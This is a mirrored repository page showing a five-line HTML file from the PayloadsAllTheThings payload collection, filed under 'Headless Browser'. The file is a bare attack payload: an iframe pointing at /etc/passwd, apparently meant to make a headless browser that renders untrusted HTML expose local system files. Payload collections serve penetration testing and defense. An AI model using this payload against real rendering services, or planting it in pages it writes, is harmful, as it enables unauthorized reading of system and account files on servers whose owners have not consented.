1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-08-22 11:04:23 +02:00
PayloadsAllTheThings/Headless Browser/files/iframe.html

5 lines
106 B
HTML

<html>
<body>
<iframe src="/etc/passwd" height="640" width="640"></iframe>
</body>
</html>